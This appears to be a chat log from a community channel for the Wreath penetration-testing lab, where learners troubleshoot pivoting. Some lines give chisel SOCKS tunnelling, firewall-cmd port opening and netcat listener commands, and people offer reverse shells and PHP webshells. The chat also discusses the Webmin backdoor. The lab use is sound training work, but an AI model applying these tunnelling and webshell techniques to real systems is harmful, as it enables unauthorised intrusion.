./chisel client 10.200.109.150:8888 1337:socks
It was 8888 here?
Whichever though
Preferably 18888 because it doesn't screw it for other people
ok it works now. thanks for the help. although i didnt get #wreath-network message error previously, i got a different error in ff, but i probs just misconfigured smtg
thanks for the help!
Np
also thx for making this network. ive been working the last week to keep up a streak (this is my second longest lol after AoC lol)
also, i realized why it wasnt working initially. i was trying to connect a socks forward to socks backwards
quick question, can i get foxyproxy to only run certain subnets through the proxy or no?
Yes, although I think that's just in foxyproxy standard
so like not the extension?
Different extension
would u recommend it and if so can u send the link so i dont download a virus
I'm pretty sure there's a link in the room?
Or not
did someone disable port 22 and 10000 from the first machine?
I can't access either
can we reset it?
Remember, there are lots of instances of wreath. If you want other people on your network to reset it, you need to specify which network you're on. The third octet.
Check that your network is still active
My PC is off so there isn't much I can do to debug
its the .200 one
That's the fourth octet
.112
Check that it's still active. Otherwise go for a reset
If it's an actual problem then others will no doubt help
I really cant do anything at all until it gets reset
Hello.... it's me again.... after yesterday... I could set up the nc.... but now after running
./nc-tzipi -lvpn 16543 (16543 is the port I used for the firewall) ... haha.. nothing happens
I watched the walkthrough video and it seems I've done everything correctly up to now .... but the
PC C:\Gitstack\gitphp>
Prompt never comes
And another thing.... while I wait for precious help on the issue above, I went ahead and tried to install empire here.... to find out Parrot OS is not supported
- Have you tried typing a command?
- I have already installed Empire on parrot
Tried starting it and it says unsupported OS, closes right on my face
u can try to install in with docker perhaps?
I'll google and see how I do that!
For me building for source worked
But the gitserv agent after connection established just died
Had same issue with powershell Rev shell
YAAAAAAAY!!!!!!!!!!!!!! Thank you so much
Installed Starkiller too, now if I only can get this nc to work, I'm ready to continue, hopefully lol
Big thank you to @trail kite for pointing me in the right direction!
Im unable to reach https:thomaswreath.thm even after updating etc/hosts file
I have tried it in different OS (Kali & windows), different browsers but nothing happens
Are you connected to the wreath network? Can you ping the ip?
Hi.. I always get "An unexpected network error occurred" whenever I try to move system.bak file to my machine but moving sam.bak works fine...
I'm getting a HTTPClient::ConnectTimeoutError with the admin or with my only login info using evil-winrm.
I'm wondering if that might be your MTU in the VPN, given the system.bak file is pretty big.
Did things like the chisel upload work for you?
That sounds like the network isn't up, or you don't have access to the port
yeah everything worked fine.... it's just copying the file is a challenge now.
It sounds like the VPN, tbh.
If you want, I can just send you the file?
That will be perfect..Please do..
Yes I'm connected to wreath network and I can ping the ip
What happens when you just go to the IP in your browser?
It shows the connection has timed out
Do you have a VPN on @undone bobcat?
No
But you have the Wreath VPN on, yes?
Ok, could you disconnect and DM me the .ovpn file please?
Yeah I will 1 min plzz
so it turns out this one is a slightly different version than the one linked in the room...
but thx, this one is better imo
@merry robin Hello.... it's me again.... after yesterday... I could set up the nc.... but now after running
./nc-tzipi -lvpn 16543 (16543 is the port I used for the firewall) ... haha.. nothing happens
i think its a dumb question but i was doing task 14 do i have to do same stuff thats is in task on the machine or i have to read them and answer the question
Nope
I'm trying to do the network again
First machine still not working
We HAVE to vote for the reset
otherwise its gonna stay broken because no one is fixing it
Has been broken since yesterday
Ok but remember there's several instances of the network. If you're pushing people to reset, you NEED to say which one you're on.
.112
Was that not the point?
Make sure that the firewall is still open from yesterday
??
Wdym?
@limber rover is everything Ok with 112?
Can you access the webmin on the first machine tho?
I have an ssh session to it
using the id_rsa
let me try webmin
yep
webmin is working
And the webserver?
Ok.
Hmm?
it's working.
let me check the ssh
gonna try regenerating the vpn
thing is, everything else apart from SSH and the Webmin port works
Just curious have you added the domain name to /etc/hosts shouldn't change anything but still
the thomaswreath.thm entry?
Gonna regen the vpn
if you want I can leave you a revshell
Yes please, or just the simple-backdoor.php from webshells
I'm already at 63% done, I dont know why this is happening to me
I'll use the php-reverse-shell.php one?
Can you give me the IP and the port you're listening on?
I'll upload the rev shell to the web root
ooh did it work?
SORRYYYY
Don't run VPNs in VPNs.
xD
I mean, it has worked with Proving Grounds vpn
idk why it didnt in this one
Thanks for the help tho
Anyone know why can't we use UDP scans when pivoting using proxychains? This is in regard to task 10.
You can only use TCP scans -- so no UDP or SYN scans. ICMP Echo packets (Ping requests) will also not work through the proxy, so use the -Pn switch to prevent Nmap from trying it.
proxychains doesn't support UDP it seems
Ain't it because proxychains forces TCP only?
interesting, you're correct James.
Now we can proxify any program. To check if it is working fine, we can run a Nmap scan to the target machine. Note that proxychains allows only TCP tunneling, so we can't use UDP communications. We can simply force Nmap not to perform ping scans with the option -PN. Let's then run the following command and see if we are able to scan the target:
~ https://blog.elearnsecurity.com/nessus-and-metasploit-scan-networks-in-pivoting.html
Tools: Nessus, Metasploit, Nmap, proxychains.
Attention: In our tests proxychains works only on 32 bit Backtrack 5
One of the best features that Metasploit offers is the ability of "pivoting"
That's interesting, will need to take a look at this later
interesting, you're correct James. you say that like it's uncommon. I googled it before asking because I suspected it didn't support UDP
haha, that interesting wasn't meant in that sense
it was more about reversing proxychains later on
Hi, @merry robin
I have an issue, the ||/resources|| won't load after I entered credentials on the .106
Can you help me plz ? Thanks
You sure you have the right credentials @compact island?
yes
And the page is loading
ow
sorry
I'm an idiot xD I was thinking that was Thomas and the password twreath
Heh, second time I've seen that. Don't worry
Ok, Thanks
Weren't you the one who cast the first vote?
task 6 reference [1] link broken ?
Works for me?
hm. might be my connection/network. odd
i have a question, it says that i have 5 days of access left, i still haven't really done anything in the room just a few questions. will my access be revoked after 5 days or can i still access it?
and the progress?
Kept.
alrighty. thanks
Obviously if the network is reset you'll need to do a bunch of stuff again because your files and stuff will be gone
understood.
#documentation
Hm?
yes but it eventually started working, was almost done
The current record is 30 seconds from starting sshuttle to RDP on .100
See if you can beat it
Muir- is there possibly a bug in your github exploit code? Line 117-121 should be indented, inside the catch exception block?
or am I reading this wrong?
Anyone have or had issues on task 20?
Able to post commands via curl and burp....no luck with a shell....unless my syntax is off someplace....idk
Nah -- by that point it's a separate condition
What's the error?
That would indicate that it's trying to connect back, and isn't
What command are you using?
Powershell.exe -c ..........
Hello, when pivoting from the first box to the second one (using the netcat method) I've tried opening up port 42069 on box1, but when the box2 connected to me, it closed immediately the connection, so then i've tried using port 16001 and it worked perfectly
Same one you are using in guide
Did you URL encode it?
What are you using to catch it?
Netcat
But then again, ports im using might be taken?!
Ill try again later. Its no biggie Muir.
Make sure the firewall is set up for it
Initially i forgot to allow said ports...
Ill give it a rest and maybe do a reset later. Thank you for the reply!
I will chuck you out Cryillic
I saw it....
you cant oppress superiority
so I started digging into how the webmin backdoor was installed. They say it was in part because the file's timestamps were modified to not show up in a git diff. But doesn't git diff based on file hashes, NOT timestamps?
even back in 2018?
This module exploits a backdoor in Webmin versions 1.890 through 1.920. Only the SourceForge downloads were backdoored, but they are listed as official downloads on the project's site. Unknown attacker(s) inserted Perl qx statements into the build server's source code on two separate occasions: once in April 2018, introducing the backdoor in the 1.890 release, and in July 2018, reintroducing the backdoor in releases 1.900 through 1.920. Only version 1.890 is exploitable in the default install. Later affected versions require the expired password changing feature to be enabled. - I don't think git was involved at all?
on https://www.webmin.com/exploit.html:
At some time in April 2018, the Webmin development build server was exploited and a vulnerability added to the password_change.cgi script. Because the timestamp on the file was set back, it did not show up in any Git diffs. This was included in the Webmin 1.890 release.
I would suspect that if you set it to a timestamp before the last commit, git would still use the last commit to compare hashes. i.e. it would ignore your commit and use the hash for the latest one (the legitimate one)
if I do a git diff locally, wouldn't git be checking file hashes, not timestamps?
Don't quote me on that though -- it's a pure guess from a programmer's perspective
yeah, I'm just guessing too.
but I guess their build process does a git pull, and somehow that pull process isn't overwriting the backdoor'ed file
clever
Hi guys
I need some help
I'm trying to download the Website.git but I can't
Is there any alternative to download it?
@merry robin Can you help me a little? Sorry for the ping
I am still having trouble too
After setting the firewall-cmd --zone=public --add-port 16543/tcp
I get success
But when I do ./nc-tzipi -lvnp 16543
Nothing happens
That's a listener -- you also need to send the command
At a guess I would say you might not be in a writeable directory
I haven't seen that error. Try putting a full path on the download?
download Website.git /tmp/Website.git for example?
I just realized what I was doing wrong lol
But yeah, you need to hit that listener with a command
So sorry I'm bothering you again Muiri
I thought after doing the firewall the next command would be the nc?
So, the listener won't actually do anything by itself -- it's just sitting there waiting for connections. You need to post the powershell script to the webshell as well
Yep, it is
Firewall -> nc listener -> curl the command to the Git server
Muir, i was listening on my attack machine
The one encoding the URL?
Love it
Set up a socat relay and be done with it
Yep
I did it yesterday but nothing happened... I'll do again!
I was banging my head against the wall lmao...
If I were to do a "get into VC and share your collective screens" for Wreath once a week or something, would that be helpful?
Might also record another video in depth for this section given it seems to be confusing people quite frequently
It makes sense why I cant listen on my local...Sometimes reading someone elses mistake makes you realize your mistake